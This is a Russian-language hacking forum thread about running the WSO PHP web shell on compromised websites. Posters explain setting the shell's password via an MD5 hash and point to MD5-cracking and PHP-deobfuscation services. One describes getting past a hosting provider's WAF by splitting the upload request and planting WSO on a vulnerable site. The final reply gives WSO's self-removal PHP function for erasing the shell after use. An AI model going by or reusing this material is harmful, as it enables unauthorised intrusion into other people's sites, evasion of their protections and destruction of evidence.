/threads/103155/page-17#post-3325981 нихрена не понял: 1. где в шелле опция смены пароля? 2. что за сумма хоста которая нужна для смены пароля? 3. если шелл обфусцирован, а не просто закодирован в base64, как вытащить хеш пароля?
1)$auth_pass = ""; 2)нужна возможность чтения файлов . там же написано сумма хоста md5(google.com) = 1d5920f4b44b27a802bd77c4f0536f5a 3)разобфусцировать обратно просто
Сумма хоста md5(google.com) = 1d5920f4b44b27a802bd77c4f0536f5a тут, слово google.com,зашифровано в md5,его хеш 1d5920f4b44b27a802bd77c4f0536f5a Чтобы поменять пасс на WSO,нужно в строчку $auth_pass = ""; вставить,md5 хеш,получится что-то вроде $auth_pass = "1d5920f4b44b27a802bd77c4f0536f5a"; Расшифровать можно тут http://md5cracker.org/ ,ну или использовать аналогичные сервисы Зашифровать свое слов в md5 можно тут http://pr-cy.ru/md5/ Деобфусцировать php можно попробовать тут http://www.unphp.net/ либо тут http://ddecode.com/phpdecoder/
Спасибо за такой подробный ответ. И раз уж речь зашла про WSO спрошу еще. Есть некий сайт на таймвебе, есть уязвимость, при залитии столкнулся с чем-то вроде WAF, который ругался на текст мини-шелла в запросе. Запрос я разделил, а потом склеил, таким образом обошел защиту, залил WSO. Но WSO не дает просматривать файлы и заливать другие файлы, при попытке срабатывает WAF и происходит переадресация на страницу таймвеб. Все другие шеллы работают замечательно. Что с WSO не так? И еще: только в WSO есть самоудаление, насколько сложен код самоудаления, чтобы например втолкнуть его в мини-шелл?
Code: function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '<h1>Suicide</h1><div class=content>remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; wsoFooter(); }